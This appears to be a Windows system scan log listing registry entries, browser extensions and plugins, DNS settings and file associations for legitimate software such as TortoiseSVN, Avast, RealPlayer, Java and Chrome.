[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise1Normal] - {C5994560-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise2Modified] - {C5994561-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise3Conflict] - {C5994562-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise4Locked] - {C5994563-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise5ReadOnly] - {C5994564-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise6Deleted] - {C5994565-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise7Added] - {C5994566-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise8Ignored] - {C5994567-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise9Unversioned] - {C5994568-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast] - {472083B0-C522-11CF-8763-00608CC02F24} --  C:\Program Files\AVAST Software\Avast\ashShA64.dll   [07/11/2014 11:59:19]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\EnhancedStorageShell] - {D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D} --  %SystemRoot%\system32\EhStorShell.dll   
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Offline Files] - {4E77131D-3629-431c-9818-C5679DC83E81} --  %SystemRoot%\System32\cscui.dll   
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\SharingPrivate] - {08244EE6-92F0-47f2-9FC9-929BAA2E7235} --  %SystemRoot%\system32\ntshrui.dll   
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise1Normal] - {C5994560-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise2Modified] - {C5994561-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise3Conflict] - {C5994562-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise4Locked] - {C5994563-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise5ReadOnly] - {C5994564-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise6Deleted] - {C5994565-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise7Added] - {C5994566-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise8Ignored] - {C5994567-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\  Tortoise9Unversioned] - {C5994568-53D9-4125-87C9-F193FC689CB2} --  C:\Program Files (x86)\Common Files\TortoiseOverlays\TortoiseOverlays.dll   [25/08/2015 20:58:06]
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\EnhancedStorageShell] - {D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D} --  %SystemRoot%\system32\EhStorShell.dll   
[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\SharingPrivate] - {08244EE6-92F0-47f2-9FC9-929BAA2E7235} --  %SystemRoot%\system32\ntshrui.dll   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}"=   


---------- | Toolbar

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"Locked"=0   
"ShowDiscussionButton"=Yes   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"ITBar7Layout"=0x13000000000000000000000030000000100001001A00000001000000000700005E01000006000000010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054265E8E2DADBF48AC2DD17F00898D060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000   
"ITBar7Height"=26   

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={012E1000-F331-11DB-8314-0800200C9A66}   
"DownloadRetries"=0   

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}"=   

[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={33BB0A4E-99AF-4226-BDF6-49120163DE86}   

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar]
"{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}"=   

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={33BB0A4E-99AF-4226-BDF6-49120163DE86}   


---------- | Extensions

[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extensions\{92780B25-18CC-41C8-B9BE-3C9C571A8263}] : () -       []

---------- | SearchScopes

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66}] - (Bing) - http://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 : 
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] - (@ieframe.dll,-12512) - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC : 
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] - () -  : 

---------- | Browser Helper Objects

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{13D67BB7-DB5F-48AA-884D-7A5D94168509}] -> () :   
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}] -> () :   
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{13D67BB7-DB5F-48AA-884D-7A5D94168509}] -> () :   
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3049C3E9-B461-4BC5-8870-4C09146192CA}] -> (RealPlayer Download and Record Plugin for Internet Explorer) : C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll  [07/11/2014 11:42:06]
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] -> (Java(tm) Plug-In SSV Helper) : C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll  [12/02/2015 22:59:44]
[HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}] -> (Java(tm) Plug-In 2 SSV Helper) : C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll  [12/02/2015 22:59:44]

---------- | Chrome

C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\aapocclcgogkmnckokdopfmhonfmgoek =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\aohghmighlieiainnegkcijnfilokake =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo =  : Google & co - http://www.youtube.com - http://www.youtube.com - Google & co - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\efaidnbmnnnibpcajpcglclefindmkaj =  :     __MSG_web2pdfExtnDescription__ -     __MSG_web2pdfExtnName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\felcaaldnbdncclmgdcncolpebgiejap =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi =  :     __MSG_extDesc__ -     __MSG_extName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\nmmhkkegccagdldgiimedpiccmgmieda =  : Google & co - Google & co - 203784468217.apps.googleusercontent.com - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\extensions\pjkljhegncpnkpknbcohdijeoejaedia =  : Google & co - https://mail.google.com/mail/ca - Google & co - [*://mail.google.com/mail/ca] - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\aapocclcgogkmnckokdopfmhonfmgoek =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\aohghmighlieiainnegkcijnfilokake =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo =  : Google & co - http://www.youtube.com - http://www.youtube.com - Google & co - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\efaidnbmnnnibpcajpcglclefindmkaj =  :     __MSG_web2pdfExtnDescription__ -     __MSG_web2pdfExtnName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\felcaaldnbdncclmgdcncolpebgiejap =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\fngmhnnpilhplaeedifhccceomclgfbg = -    short_name: Tables - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi =  :     __MSG_extDesc__ -     __MSG_extName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\nmmhkkegccagdldgiimedpiccmgmieda =  : Google & co - Google & co - 203784468217.apps.googleusercontent.com - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\extensions\pjkljhegncpnkpknbcohdijeoejaedia =  : Google & co - https://mail.google.com/mail/ca - Google & co - [*://mail.google.com/mail/ca] - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\aapocclcgogkmnckokdopfmhonfmgoek =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\aohghmighlieiainnegkcijnfilokake =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo =  : Google & co - http://www.youtube.com - http://www.youtube.com - Google & co - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\efaidnbmnnnibpcajpcglclefindmkaj =  :     __MSG_web2pdfExtnDescription__ -     __MSG_web2pdfExtnName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\felcaaldnbdncclmgdcncolpebgiejap =  : Google & co - Google & co - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi =  :     __MSG_extDesc__ -     __MSG_extName__ - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\nmmhkkegccagdldgiimedpiccmgmieda =  : Google & co - Google & co - 203784468217.apps.googleusercontent.com - https://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\pjkljhegncpnkpknbcohdijeoejaedia =  : Google & co - https://mail.google.com/mail/ca - Google & co - [*://mail.google.com/mail/ca] - http://clients2.google.com/service/update2/crx
C:\Users\PC\AppData\Local\Google\Chrome\User Data\Profile 1\extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm =  :     Provider for discovery and services for mirroring of Chrome Media Router -     Chrome Media Router - 919648714761-55j965o0km033psv3i9qls5mo3qtdrb0.apps.googleusercontent.com - https://clients2.google.com/service/update2/crx

[HKLM\Software\Google\Chrome\Extensions\ngpampappnmepgilojfohadhhmbhlaek]
[HKLM\Software\WOW6432Node\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj]
[HKLM\Software\WOW6432Node\Google\Chrome\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk]

---------- | Opera

C:\Users\PC\AppData\Roaming\Opera Software\Opera Stable\extensions\jdmkclkigoemafepfpiljdlgnoloicom =  : Google & co - Google & co
C:\Users\PC\AppData\Roaming\Opera Software\Opera Stable\extensions\jenggbjfjblgmpcfejchbpnpineboigk =  : Google & co - Google & co

---------- | Firefox


[HKLM\Software\WOW6432Node\mozilla\Firefox\Extensions]
"{0153E448-190B-4987-BDE1-F256CADA672F}"=C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
[HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer] - (Adobe® Flash® Player 26.0.0.137 Plugin) : C:\Windows\system32\Macromed\Flash\NPSWF64_26_0_0_137.dll
[HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE] - () : disabled
[HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] - (Ag Player Plugin) : C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@adobe.com/FlashPlayer] - (Adobe® Flash® Player 26.0.0.137 Plugin) : C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.31.2] - (Java™ Deployment Toolkit) : C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.31.2] - (Oracle® Next Generation Java™ Plug-In) : C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@microsoft.com/GENUINE] - () : disabled
[HKLM\Software\WOW6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] - (Ag Player Plugin) : C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@real.com/nppl3260;version=15.0.6.14] - (RealPlayer(tm) LiveConnect-Enabled Plug-In) : C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@real.com/nprjplug;version=15.0.6.14] - (RealJukebox Netscape Plugin) : C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@real.com/nprpchromebrowserrecordext;version=15.0.6.14] - (RealNetworks(tm) RealPlayer Chrome Background Extension Plug-In) : C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@real.com/nprphtml5videoshim;version=15.0.6.14] - (RealPlayer(tm) HTML5VideoShim Plug-In) : C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@real.com/nprpplugin;version=15.0.6.14] - (RealPlayer Download Plugin) : C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3] - (Google Update) : C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9] - (Google Update) : C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\@videolan.org/vlc,version=2.0.5] - (VLC Multimedia Plugin) : C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKLM\Software\WOW6432Node\MozillaPlugins\Adobe Reader] - (Handles PDFs in-place in Firefox) : C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


C:\Users\PC\AppData\Roaming\Mozilla\Firefox\Profiles\lu0bbvef.default\Prefs.js

user_pref("browser.startup.homepage", "about:home");
user_pref("browser.startup.homepage_override.buildID", "20141011015303");
user_pref("browser.startup.homepage_override.mstone", "33.0");
user_pref("extensions.autoDisableScopes", 0);
user_pref("extensions.blocklist.pingCountTotal", 4);
user_pref("extensions.blocklist.pingCountVersion", 4);
user_pref("extensions.bootstrappedAddons", "{}");
user_pref("extensions.databaseSchema", 16);
user_pref("extensions.enabledAddons", "mozilla_cc2%40internetdownloadmanager.com:6.27.3,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.0");
user_pref("extensions.getAddons.cache.lastUpdate", 1498570253);
user_pref("extensions.getAddons.databaseSchema", 5);
user_pref("extensions.hotfix.lastVersion", "20150311.01");
user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"{0153E448-190B-4987-BDE1-F256CADA672F}\":{\"descriptor\":\"C:\\\\ProgramData\\\\Real\\\\RealPlayer\\\\BrowserRecordPlugin\\\\Firefox\\\\Ext\",\"mtime\":1497455869047,\"rdfTime\":1415360526594}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\browser\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1415360396464,\"rdfTime\":1413023222000}}},{\"name\":\"winreg-app-user\",\"addons\":{\"mozilla_cc2@internetdownloadmanager.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\idmmzcc2.xpi\",\"mtime\":1485426954000}}}]");
user_pref("extensions.lastAppVersion", "33.0");
user_pref("extensions.lastPlatformVersion", "33.0");
user_pref("extensions.pendingOperations", false);
user_pref("extensions.shownSelectionUI", true);
user_pref("extensions.ui.dictionary.hidden", true);
user_pref("extensions.ui.experiment.hidden", true);
user_pref("extensions.ui.lastCategory", "addons://list/plugin");
user_pref("extensions.ui.locale.hidden", true);


[Profile0] - Name=default -> Profiles/lu0bbvef.default

---------- | DNS

[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters]
"DhcpNameServer"=192.168.1.1
[HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{AD8C7EE0-625C-4694-ACBF-5633AE50D142}]
"DhcpNameServer"=192.168.1.1
[HKLM\SYSTEM\ControlSet002\services\Tcpip\Parameters\Interfaces\{AD8C7EE0-625C-4694-ACBF-5633AE50D142}]
"DhcpNameServer"=192.168.1.1
[HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{AD8C7EE0-625C-4694-ACBF-5633AE50D142}]
"DhcpNameServer"=192.168.1.1

---------- | Applications

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Classes\Applications\7z.exe] : "C:\Program Files\7-Zip\7z.exe" "%1"
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Classes\Applications\RealPlay.exe] : "C:\Program Files (x86)\Real\RealPlayer\realplay.exe" "%1"
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Classes\Applications\uTorrent.exe] : "C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\coverdes.exe] : "C:\Program Files (x86)\Nero\Nero CoverDesigner\CoverDes.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\DXTEX.exe] : "C:\Program Files (x86)\Microsoft DirectX SDK (November 2008)\Utilities\Bin\x86\DXTex.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\DXViewer.exe] : "C:\Program Files (x86)\Microsoft DirectX SDK (November 2008)\Utilities\Bin\x86\DXViewer.exe"  "%1"
[HKLM\SOFTWARE\Classes\Applications\ehshell.exe] : "C:\Windows\eHome\ehshell.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\iexplore.exe] : "C:\Program Files (x86)\Internet Explorer\iexplore.exe" %1
[HKLM\SOFTWARE\Classes\Applications\nero.exe] : "C:\Program Files (x86)\Nero\Nero Burning ROM\nero.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\notepad.exe] : %SystemRoot%\system32\NOTEPAD.EXE %1
[HKLM\SOFTWARE\Classes\Applications\ois.exe] : C:\PROGRA~2\MICROS~1\Office12\OIS.EXE /shellOpen "%1"
[HKLM\SOFTWARE\Classes\Applications\photoviewer.dll] : %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1
[HKLM\SOFTWARE\Classes\Applications\RealPlay.exe] : "C:\Program Files (x86)\Real\RealPlayer\realplay.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\vlc.exe] : "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file "%1"
[HKLM\SOFTWARE\Classes\Applications\WinRAR.exe] : "C:\Program Files (x86)\WinRAR\WinRAR.exe" "%1"
[HKLM\SOFTWARE\Classes\Applications\wmplayer.exe] : "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L"
[HKLM\SOFTWARE\Classes\Applications\wordpad.exe] : "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\coverdes.exe] : "C:\Program Files (x86)\Nero\Nero CoverDesigner\CoverDes.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\DXTEX.exe] : "C:\Program Files (x86)\Microsoft DirectX SDK (November 2008)\Utilities\Bin\x86\DXTex.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\DXViewer.exe] : "C:\Program Files (x86)\Microsoft DirectX SDK (November 2008)\Utilities\Bin\x86\DXViewer.exe"  "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\ehshell.exe] : "C:\Windows\eHome\ehshell.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\iexplore.exe] : "C:\Program Files (x86)\Internet Explorer\iexplore.exe" %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\nero.exe] : "C:\Program Files (x86)\Nero\Nero Burning ROM\nero.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\notepad.exe] : %SystemRoot%\system32\NOTEPAD.EXE %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\ois.exe] : C:\PROGRA~2\MICROS~1\Office12\OIS.EXE /shellOpen "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\photoviewer.dll] : %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\RealPlay.exe] : "C:\Program Files (x86)\Real\RealPlayer\realplay.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\vlc.exe] : "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\WinRAR.exe] : "C:\Program Files (x86)\WinRAR\WinRAR.exe" "%1"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\wmplayer.exe] : "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L"
[HKLM\SOFTWARE\WOW6432Node\Classes\Applications\wordpad.exe] : "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1"

---------- | SvcHost (Whitelist)

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"regsvc"=RemoteRegistry
"DcomLaunch"=Power
PlugPlay
DcomLaunch
"secsvcs"=WinDefend
"bthsvcs"=bthserv
"PeerDist"=PeerDistSvc

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SvcHost]
"DcomLaunch"=Power
PlugPlay
DcomLaunch
"LocalServices"=MSLN
"imgsvr"=wiasvc


---------- | SvcHost - Netsvcs (Whitelist)

Term -  : 

---------- | Software

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\7-Zip]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Adobe]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\AMD]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Analog Devices]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Ankama]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\AppDataLow]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\ATI]
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Avast Software]
